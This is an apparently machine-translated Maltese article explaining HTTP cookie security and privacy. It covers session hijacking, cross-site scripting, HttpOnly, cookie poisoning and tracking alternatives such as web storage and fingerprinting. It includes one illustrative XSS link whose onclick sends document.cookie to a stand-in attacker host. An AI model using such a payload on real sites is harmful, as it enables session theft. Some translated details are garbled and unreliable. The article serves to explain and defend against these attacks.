Din il-problema tista 'tiġi megħluba permezz ta' kriptaġġ tal-konnessjoni bejn il-kompjuter tal-utent u s-server bl-użu tal-protokoll HTTPS. Server jista' jispeċifika a bandiera sigura waqt li tissettja cookie; il-browser jibgħatha biss fuq linja sigura, bħal konnessjoni SSL.

Madankollu ħafna siti, għalkemm jużaw komunikazzjoni kodifikata HTTPS għall-awtentikazzjoni tal-utent (jiġifieri l-paġna tal-login), aktar tard jibagħtu cookies tas-sessjoni u data oħra bħala normali, permezz ta’ konnessjonijiet HTTP mhux kriptati għal raġunijiet ta’ effiċjenza. L-attakkanti jistgħu għalhekk jinterċettaw il-cookies ta' utenti oħra u jippersonawhom f'siti xierqa jew jużawhom f'attakki tal-cookies.

Scripting fis-sit: cookie li għandha tiġi skambjata biss bejn is-server u l-klijent tintbagħat lil parti terza oħra.

Mod ieħor biex tisraq il-cookies huwa li tikteb siti u l-browser innifsu jibgħat cookies lil servers malizzjużi li qatt ma jirċevuhom. Brawżers moderni jippermettu l-eżekuzzjoni ta 'partijiet ta' kodiċi mfittxija mis-server. Jekk il-cookies jiġu aċċessati waqt ir-runtime, il-valuri tagħhom jistgħu jiġu kkomunikati f'xi forma lil servers li m'għandhomx jaċċessawhom. Il-kriptaġġ tal-cookies qabel ma jintbagħtu fuq in-netwerk ma jgħinx ifixkel l-attakk.

Dan it-tip ta' scripting fis-sit huwa tipikament impjegat minn attakkanti fuq siti li jippermettu lill-utenti jpoġġu kontenut HTML. Billi tintegra parti minn kodiċi kompatibbli fil-kontribuzzjoni HTML, attakkant jista 'jirċievi cookies minn utenti oħra. L-għarfien ta’ dawn il-cookies jista’ jintuża billi tikkonnettja mal-istess sit bl-użu tal-cookies misruqa, u b’hekk jiġi rikonoxxut bħala l-utent li l-cookies tiegħu insterqu.

Mod wieħed biex jiġu evitati attakki bħal dawn huwa li tuża l-bandiera HttpOnly; hija għażla, introdotta mill-verżjoni 6 tal-Internet Explorer fil-PHP mill-verżjoni 5.2.0 li hija ppjanata li tagħmel il-cookie inaċċessibbli għall-klijent qrib l-iskritt. Madankollu, l-iżviluppaturi tal-web għandhom iqisu dan fl-iżvilupp tas-sit tagħhom sabiex ikunu immuni għall-iskript fis-sit.

Theddida oħra għas-sigurtà użata hija l-fabbrikazzjoni tad-domanda fis-sit.

L-ispeċifikazzjoni teknika uffiċjali tippermetti li l-cookies jintbagħtu lura biss lil servers fid-dominju li minnu oriġinaw. Madankollu, il-valur tal-cookies jista’ jintbagħat lil servers oħra bl-użu ta’ mezzi oħra għajr il-cookies headers.

B'mod partikolari, il-lingwi tal-iskript bħal JavaScript huma ġeneralment permessi jaċċessaw il-valuri tal-cookies u huma kapaċi jibagħtu valuri arbitrarji lil kwalunkwe server fuq l-Internet. Din il-kapaċità ta' skriptjar tintuża minn websajts li jippermettu lill-utenti jpoġġu kontenut HTML għal utenti oħra biex jaraw.

Pereżempju, attakkant li jopera fuq id-dominju example.com jista' jippubblika kumment li jkun fih il-link li ġejja li tipponta lejn blog popolari li inkella ma jikkontrollawx:

<a href="#" onclick="window.location = 'http://exemple.com/stole.cgi?text=' + escape(document.cookie); return false;">Cliquez ici !</a>

Meta utent ieħor jikklikkja fuq din il-link, il-browser jesegwixxi l-parti tal-attribut onclick tal-kodiċi, u għalhekk jissostitwixxi s-sekwenza document.cookie bil-lista tal-cookies tal-utent li huma attivi għal din il-paġna. Għalhekk, din il-lista ta 'cookies tintbagħat lis-server example.com, u l-attakkant huwa għalhekk kapaċi jiġbor il-cookies ta' dan l-utent.

Dan it-tip ta 'attakk huwa diffiċli biex jinstab min-naħa tal-utent minħabba li l-iskript ġej mill-istess dominju li stabbilixxa l-cookie, u l-operazzjoni biex jintbagħtu l-valuri tidher li hija awtorizzata minn dak id-dominju. Huwa meqjus li hija r-responsabbiltà tal-amministraturi li joperaw dan it-tip ta' sit li jistabbilixxu restrizzjonijiet li jipprevjenu l-pubblikazzjoni ta' kodiċi malizzjuż.

Il-cookies mhumiex viżibbli direttament għal programmi min-naħa tal-klijent bħal JavaScript jekk intbagħtu bil-bandiera HttpOnly. Mill-perspettiva tas-server, l-unika differenza hija li fil-linja tal-header Set-Cookie hemm miżjud qasam ġdid li fih is-string HttpOnly:

Set-Cookie: RMID=732423sdfs73242; expires=Fri, 31-Dec-2010 23:59:59 GMT; path=/; domain=.exemple.net; HttpOnly

Meta l-browser jirċievi cookie bħal din, suppost jużaha b'mod normali fl-iskambju HTTP li ġej, iżda mingħajr ma jagħmilha viżibbli għall-iskripts esegwiti fuq in-naħa tal-klijent. Il-bandiera HttpOnly mhijiex parti minn xi speċifikazzjoni teknika uffiċjali, u mhix implimentata fil-browsers kollha. Innota li bħalissa m'hemm l-ebda mod kif tipprevjeni l-qari u l-kitba tal-cookies tas-sessjoni bil-metodu XMLHTTPRequest.

Modifika tal-kontenut: attakkant jibgħat cookie invalida lil server, possibbilment magħmula minn cookie valida mibgħuta mis-server.

Bidla tal-cookies

Hekk kif il-cookies jeħtieġ li jinħażnu u jintbagħtu lura mhux mibdula lis-server, attakkant jista’ jimmodifika l-valur tal-cookies qabel ma jintbagħtu lura lis-server. Pereżempju, jekk cookie fiha l-valur totali li l-utent irid iħallas għall-oġġetti mqiegħda fil-shopping cart tal-maħżen, il-bdil ta 'dan il-valur jesponi lis-server għar-riskju li jiċċarġja lill-attakkant inqas mill-prezz tal-bidu. Il-proċess tal-modifika tal-valur tal-cookies jissejjaħ avvelenament tal-cookie u jistgħu jintużaw wara serq tal-cookie biex jagħmlu l-attakk persistenti.

Fil-metodu tal-cookie override, l-attakkant jisfrutta glitch tal-browser biex jibgħat cookie invalida lis-server.

Il-biċċa l-kbira tal-websajts, madankollu, jaħżnu biss ID tas-sessjoni - numru uniku ġġenerat bl-addoċċ użat biex jidentifika l-utent tas-sessjoni - fil-cookie innifsu, filwaqt li l-informazzjoni l-oħra kollha tinħażen fuq is-server. F'dan il-każ, din il-problema hija solvuta fil-biċċa l-kbira.

Immaniġġjar tal-cookies bejn websajts

Kull sit huwa mistenni li jkollu l-cookies tiegħu, għalhekk sit wieħed m'għandux ikun jista' jimmodifika jew joħloq cookies assoċjati ma' sit ieħor. Difett fis-sigurtà tal-web browser jista’ jippermetti lis-siti malizzjużi jiksru din ir-regola. L-isfruttament ta 'difett bħal dan huwa komunement imsejjaħ tisjir bejn is-sit. L-iskop ta' dawn l-attakki jista' jkun serq ta' ID ta' sessjoni.

L-utenti għandhom jużaw l-aħħar verżjonijiet tal-web browsers li fihom dawn il-vulnerabbiltajiet huma prattikament eliminati.

Stat konfliġġenti bejn il-klijent u s-server

L-użu tal-cookies jista' jiġġenera kontradizzjoni bejn l-istat tal-klijent u l-istat maħżun fil-cookie. Jekk l-utent jakkwista cookie u jikklikkja fuq il-buttuna "Lura" tal-browser, l-istat tal-browser ġeneralment mhuwiex l-istess bħal qabel dan l-akkwist. Pereżempju, jekk il-basket ta’ ħanut online jinħoloq bl-użu tal-cookies, il-kontenut tal-basket ma jistax jinbidel meta l-utent jerġa’ lura għall-istorja tal-browser: jekk l-utent jagħfas buttuna biex iżżid artiklu fil-basket tiegħu u jikklikkja fuq il-"Ritorn ", l-artiklu jibqa' f'dan wieħed. Din tista 'ma tkunx l-intenzjoni tal-utent, li ċertament irid jikkanċella ż-żieda tal-artikolu. Dan jista 'jwassal għal nuqqas ta' affidabilità, konfużjoni, u bugs. Allura l-iżviluppaturi tal-web għandhom ikunu konxji ta 'din il-problema u jimplimentaw miżuri biex jimmaniġġjaw sitwazzjonijiet bħal din.

Skadenza tal-cookies

Il-cookies persistenti ġew ikkritikati mill-esperti tas-sigurtà tal-privatezza talli ma ġewx stabbiliti biex jiskadu malajr biżżejjed, u b'hekk ippermettew lill-websajts li jsegwu l-utenti u jibnu l-profil tagħhom maż-żmien. Dan l-aspett tal-cookies huwa wkoll parti mill-problema tal-ħtif tas-sessjoni, minħabba li cookie persistenti misruqa tista’ tintuża biex tippersona utent għal perjodu ta’ żmien konsiderevoli.

Biex taqra wkoll: GAFAM: min huma? Għaliex huma (xi kultant) daqshekk tal-biża?

Alternattivi għall-cookies

Xi operazzjonijiet li jistgħu jitwettqu bl-użu tal-cookies jistgħu jsiru wkoll bl-użu ta’ mekkaniżmi oħra li jevitaw il-cookies jew jirrikreaw cookies mħassra, li joħloq kwistjonijiet ta’ privatezza bl-istess mod (jew xi drabi agħar għax imbagħad inviżibbli) mill-cookies.

Indirizz IP

L-utenti jistgħu jiġu ssorveljati bl-indirizz IP tal-kompjuter li jsejjaħ il-paġna. Din it-teknika ilha disponibbli sa mill-introduzzjoni tal-World Wide Web, hekk kif il-paġni jitniżżlu s-server jitlob l-indirizz IP tal-kompjuter li jħaddem il-browser jew il-proxy, jekk l-ebda wieħed ma jintuża. Is-server jista’ jsegwi din l-informazzjoni kemm jekk hemmx cookies użati jew le. Madankollu, dawn l-indirizzi huma tipikament inqas affidabbli fl-identifikazzjoni ta’ utent mill-cookies minħabba li l-kompjuters u l-prokuri jistgħu jinqasmu minn diversi utenti, u l-istess kompjuter jista’ jirċievi indirizz IP differenti f’kull sessjoni ta’ xogħol (bħal ċ spiss ikun il-każ għal konnessjonijiet tat-telefon) .

It-traċċar mill-indirizzi IP jista 'jkun affidabbli f'xi sitwazzjonijiet, bħal konnessjonijiet tal-broadband li jżommu l-istess indirizz IP għal żmien twil, sakemm l-enerġija tkun mixgħula.

Xi sistemi bħal Tor huma ddisinjati biex iżommu l-anonimità tal-Internet u jagħmlu l-intraċċar bl-indirizz IP impossibbli jew impossibbli.

URL

Teknika aktar preċiża hija bbażata fuq l-inkorporazzjoni ta 'informazzjoni fl-URLs. Il-parti tas-sekwenza tal-mistoqsijiet tal-URL hija teknika waħda li tipikament tintuża għal dan il-għan, iżda jistgħu jintużaw partijiet oħra wkoll. Kemm is-servelet Java kif ukoll il-mekkaniżmi tas-sessjoni PHP jużaw dan il-metodu jekk il-cookies ma jkunux attivati.

Dan il-metodu jinvolvi li s-server tal-web jehmeż talbiet ta' string mal-links tal-paġna web li ġġorrha meta tintbagħat lill-browser. Meta l-utent isegwi link, il-browser jirritorna s-sekwenza tal-mistoqsijiet mehmuża lis-server.

Is-sekwijiet ta' mistoqsijiet użati għal dan il-għan u l-cookies huma simili ħafna, it-tnejn huma informazzjoni magħżula b'mod arbitrarju mis-server u rritornati mill-browser. Madankollu, hemm xi differenzi: meta URL li jkun fih sekwenza ta' mistoqsijiet terġa' tintuża, l-istess informazzjoni tintbagħat lis-server. Pereżempju, jekk il-preferenzi ta' utent huma kkodifikati f'sekwenza ta' mistoqsijiet ta' URL u l-utent jibgħat dak il-URL lil utent ieħor permezz ta' email, dak l-utent ikun jista' juża wkoll dawk il-preferenzi.

Min-naħa l-oħra, meta utent jaċċessa l-istess paġna darbtejn, m'hemm l-ebda garanzija li l-istess sekwenza ta' mistoqsijiet se tintuża ż-żewġ darbiet. Pereżempju, jekk utent jinżel fuq paġna minn paġna interna tas-sit l-ewwel darba u jinżel fuq l-istess paġna minn paġna esterna t-tieni darba, is-sekwenza tal-mistoqsijiet relattiva għall-paġna tas-sit hija tipikament differenti, filwaqt li l-cookies huma l-istess .

Żvantaġġi oħra ta’ strings ta’ mistoqsijiet huma relatati mas-sigurtà: iż-żamma ta’ data li tidentifika sessjoni fi strings ta’ mistoqsijiet tippermetti jew tissimplifika attakki ta’ fissazzjoni ta’ sessjoni, attakki ta’ referenza ta’ identifikatur, u sfruttamenti oħra. Il-passaġġ tal-IDs tas-sessjoni bħala cookies HTTP huwa aktar sigur.

Qasam tal-formola moħbija

Forma waħda ta 'traċċar ta' sessjoni, użata minn ASP.NET, hija li tuża formoli tal-web b'oqsma moħbija. Din it-teknika hija simili ħafna għall-użu ta 'kordi ta' query URL biex iġorr l-informazzjoni u għandha l-istess vantaġġi u żvantaġġi; u jekk il-formola tiġi pproċessata bil-metodu HTTP GET, l-oqsma fil-fatt isiru parti mill-URL tal-browser li jibgħatha meta tissottometti l-formola. Iżda l-biċċa l-kbira tal-formoli huma pproċessati b'HTTP POST, li jikkawża li l-informazzjoni tal-formola, inklużi oqsma moħbija, tiżdied bħala input addizzjonali li la hija parti mill-URL u lanqas cookie.

Dan l-approċċ għandu żewġ vantaġġi minn perspettiva ta 'traċċar: l-ewwel, it-traċċar tal-informazzjoni mqiegħda fil-kodiċi tas-sors HTML u l-input POST aktar milli l-URL se jippermetti lill-utent medju jevita dan it-traċċar; it-tieni, l-informazzjoni tas-sessjoni ma tiġix ikkupjata meta l-utent tikkopja l-URL (biex issalva l-paġna fuq disk jew tibgħatha permezz tal-email, pereżempju).

tieqa.isem

Il-web browsers komuni kollha jistgħu jaħżnu ammont pjuttost kbir ta' dejta (2MB sa 32MB) permezz ta' JavaScript bl-użu tal-proprjetà window.name tad-DOM. Din id-dejta tista’ tintuża minflok cookies tas-sessjoni u tintuża wkoll f’dominji kollha. It-teknika tista 'tiġi akkoppjata ma' oġġetti JSON biex taħżen sett kumpless ta 'varjabbli ta' sessjoni min-naħa tal-klijent.

L-iżvantaġġ huwa li kull tieqa jew tab separata inizjalment se jkollha tieqa.name vojta; meta tibbrawżja bit-tabs (miftuħa mill-utent) dan ifisser li t-tabs miftuħa individwalment mhux se jkollhom isem ta 'tieqa. Barra minn hekk window.name jista 'jintuża biex jintraċċa viżitaturi f'siti differenti li jistgħu joħolqu kwistjoni ta' privatezza.

F'ċerti aspetti dan jista' jkun aktar sigur mill-cookies, minħabba n-nuqqas ta' involviment tas-server, u b'hekk jagħmilha invulnerabbli għall-attakk tan-netwerk tal-cookies sniffer. Madankollu, jekk jittieħdu miżuri speċjali biex tiġi protetta d-dejta, hija vulnerabbli għal aktar attakki, peress li d-dejta tkun disponibbli permezz ta’ siti oħra miftuħa fl-istess tieqa.

Awtentikazzjoni HTTP

Il-protokoll HTTP jinkludi l-protokolli bażiċi tal-awtentikazzjoni tal-aċċess u d-diġest tal-awtentikazzjoni tal-aċċess, li jippermetti aċċess għal paġna web biss meta l-utent ikun ta l-isem tal-utent u l-password. Jekk is-server jitlob ċertifikat biex jagħti aċċess għal paġna web, il-browser jitlobha mingħand l-utent u ladarba jinkiseb, il-browser jaħżen u jibgħatu fit-talbiet HTTP sussegwenti kollha. Din l-informazzjoni tista 'tintuża biex issegwi l-utent.

Oġġett kondiviż lokali

Jekk browser jinkludi l-plugin Adobe Flash Player, il- oġġetti kondiviżi lokali jistgħu jintużaw għall-istess għan bħall-cookies. Jistgħu jkunu għażla attraenti għall-iżviluppaturi tal-web minħabba li:

• il-limitu tad-daqs default għal oġġett kondiviż lokali huwa 100 KB;
• il-kontrolli tas-sigurtà huma separati mill-kontrolli tal-cookies tal-utent (għalhekk oġġetti kondiviżi lokali jistgħu jitħallew meta l-cookies ma jkunux).

Dan l-aħħar punt, li jiddistingwi l-politika tal-ġestjoni tal-cookies minn dik tal-oġġetti kondiviżi lokali tal-Adobe iqajjem mistoqsijiet dwar il-ġestjoni mill-utent tas-settings tal-privatezza tiegħu: huwa għandu jkun konxju li l-ġestjoni tiegħu tal-cookies m'għandha l-ebda impatt fuq il-ġestjoni ta 'oġġetti kondiviżi lokali, u viċi versa.

Kritika oħra ta 'din is-sistema hija li tista' tintuża biss permezz tal-plugin Adobe Flash Player li huwa proprjetarju u mhux standard tal-web.

Persistenza min-naħa tal-klijent

Xi web browsers jappoġġjaw mekkaniżmu ta' persistenza bbażat fuq skript, li jippermetti li l-paġna taħżen informazzjoni lokalment għal użu aktar tard. L-Internet Explorer, pereżempju, jappoġġja informazzjoni persistenti fl-istorja tal-browser, bookmarks, f'format maħżun f'XML, jew direttament ma' paġna tal-web salvata fuq disk. Għall-Microsoft Internet Explorer 5, hemm metodu ta' dejta tal-utent disponibbli permezz ta' imġieba DHTML.

Il-W3C introduċa fl-HTML 5 JavaScript API ġdid għall-ħażna tad-dejta fuq in-naħa tal-klijent imsejjaħ Web storage u kellu l-għan li jissostitwixxi b'mod permanenti l-cookies. Huwa simili għall-cookies iżda b'kapaċità mtejba ħafna u mingħajr ma taħżen informazzjoni fil-header tat-talbiet HTTP. L-API tippermetti żewġ tipi ta’ ħażna fuq il-web: ħażna lokali u ħażna ta’ sessjoni, simili għal cookies persistenti u cookies ta’ sessjoni (ħlief li l-cookies tas-sessjoni jiskadu meta l-browser jingħalaq waqt li sessjoni ħażna jiskadi meta t-tab tingħalaq), rispettivament. Il-ħażna tal-web hija appoġġjata minn Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 u Opera 10.50.

Mekkaniżmu differenti normalment jiddependi fuq il-caching tal-browser (fil-memorja aktar milli l-aġġornament) bl-użu ta 'programmi JavaScript fil-paġni tal-web. 

Pereżempju, paġna jista' jkun fiha t-tikketta . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

F'dan il-punt, il-programm jibqa' fil-memorja cache u l-paġna miżjura ma terġax tiġi mgħobbija għat-tieni darba. Konsegwentement, jekk il-programm ikun fih varjabbli globali (pereżempju var id = 3243242;), dan l-identifikatur jibqa’ validu u jista’ jiġi sfruttat minn kodiċi JavaScript ieħor ladarba l-paġna terġa’ titgħabba, jew ladarba titgħabba paġna li tgħaqqad il-programm. 

L-iżvantaġġ ewlieni ta 'dan il-metodu huwa li l-varjabbli globali JavaScript għandha tkun statika, li jfisser li ma tistax tinbidel jew titħassar bħal cookie.

marki tas-swaba' tal-web browser

Marka tas-swaba' tal-browser hija informazzjoni miġbura dwar is-settings tal-konfigurazzjoni ta' browser għal skopijiet ta' identifikazzjoni. Dawn il-marki tas-swaba' jistgħu jintużaw biex jidentifikaw kompletament jew parzjalment utent tal-Internet jew apparat anki meta l-cookies huma diżattivati.

L-informazzjoni bażika tal-konfigurazzjoni tal-web browser ilha tinġabar mis-servizzi tal-udjenza tal-websajt bil-għan li jitkejjel b'mod preċiż it-traffiku tal-web tal-bniedem u jiġu skoperti diversi forom ta 'frodi tal-ikklikkjar. Bl-għajnuna ta 'lingwi ta' skripts min-naħa tal-klijent, il-ġbir ta 'informazzjoni huwa ferm aktar preċiż issa possibbli.

Il-konverżjoni ta 'din l-informazzjoni fi string daqsxejn tipproduċi marki tas-swaba' tal-apparat. Fl-2010, l-Electronic Frontier Foundation (EFF) kejlet l-entropija tal-marki tas-swaba’ ta’ browser biex tkun mill-inqas Bits 18,1, u dan kien qabel l-avvanzi fil-marki tas-swaba 'tal-kanvas żiedu 5,7 bits għal dik l-entropija.

Cookies fil-qosor

Il-cookies huma fajls żgħar ta’ test maħżuna mill-web browser fuq il-hard drive ta’ viżitatur tal-websajt u li jintużaw (fost affarijiet oħra) biex jirreġistraw informazzjoni dwar il-viżitatur jew il-vjaġġ tagħhom permezz tas-sit. Il-webmaster jista' għalhekk jagħraf id-drawwiet ta' viżitatur u jippersonalizza l-preżentazzjoni tas-sit tiegħu għal kull viżitatur; il-cookies imbagħad jagħmluha possibbli li wieħed jiftakar kemm-il artikli għandhom jintwerew fuq il-home page jew saħansitra li jżommu l-kredenzjali tal-login għal kwalunkwe parti privata: meta l-viżitatur jirritorna fis-sit, ma jkunx aktar meħtieġ għalih li jikteb ismu u l-password biex jiġu rikonoxxuti, peress li jinqraw awtomatikament fil-cookie.

Cookie għandha ħajja limitata, stabbilita mid-disinjatur tas-sit. Jistgħu wkoll jiskadu fl-aħħar tas-sessjoni fuq is-sit, li jikkorrispondi għall-għeluq tal-browser. Il-cookies jintużaw ħafna biex jagħmlu l-ħajja eħfef għall-viżitaturi u jippreżentawhom b'informazzjoni aktar rilevanti. Iżda tekniki speċjali jagħmluha possibbli li ssegwi viżitatur f'diversi siti u b'hekk tiġbor u tikkontrolla informazzjoni estensiva ħafna dwar id-drawwiet tiegħu. Dan il-metodu ta lill-użu tal-cookies reputazzjoni bħala teknika ta' sorveljanza li tikser il-privatezza tal-viżitaturi, li sfortunatament tikkorrispondi mar-realtà f'ħafna każijiet ta' użu għal raġunijiet mhux tekniċi jew li ma tirrispettax l-aspettattivi tal-utent. .

Bi tweġiba għal dawn il-biżgħat leġittimi, HTML 5 jintroduċi API JavaScript ġdida għall-ħażna tad-dejta min-naħa tal-klijent imsejħa ħażna tal-Web, li hija ħafna aktar sigura u b'kapaċità akbar, li għandha l-għan li tissostitwixxi l-cookies.

Ħażna ta' cookies

B'xi browsers, cookie hija editjabbli faċilment, editur ta 'test sempliċi bħal Notepad huwa biżżejjed biex jibdel il-valuri tiegħu manwalment.

Il-cookies jiġu ffrankati b'mod differenti skont il-browser:

• Microsoft Internet Explorer jiffranka kull cookie f'fajl differenti;
• Mozilla Firefox jiffranka l-cookies kollha tiegħu f'fajl wieħed;
• opra jiffranka l-cookies kollha tiegħu f'fajl wieħed u jikkodifikahom (impossibbli li timmodifikahom ħlief fl-għażliet tas-softwer);
• Apple Safari jiffranka l-cookies kollha tiegħu f'fajl ta' estensjoni .plist wieħed. Il-modifika hija possibbli iżda mhux faċli ħafna, sakemm ma tgħaddix mill-għażliet tas-softwer.

Il-browsers huma meħtieġa biex jappoġġjaw minima :

• 300 cookie simultanja;
• 4 o kull cookie;
• 20 cookie għal kull host jew dominju.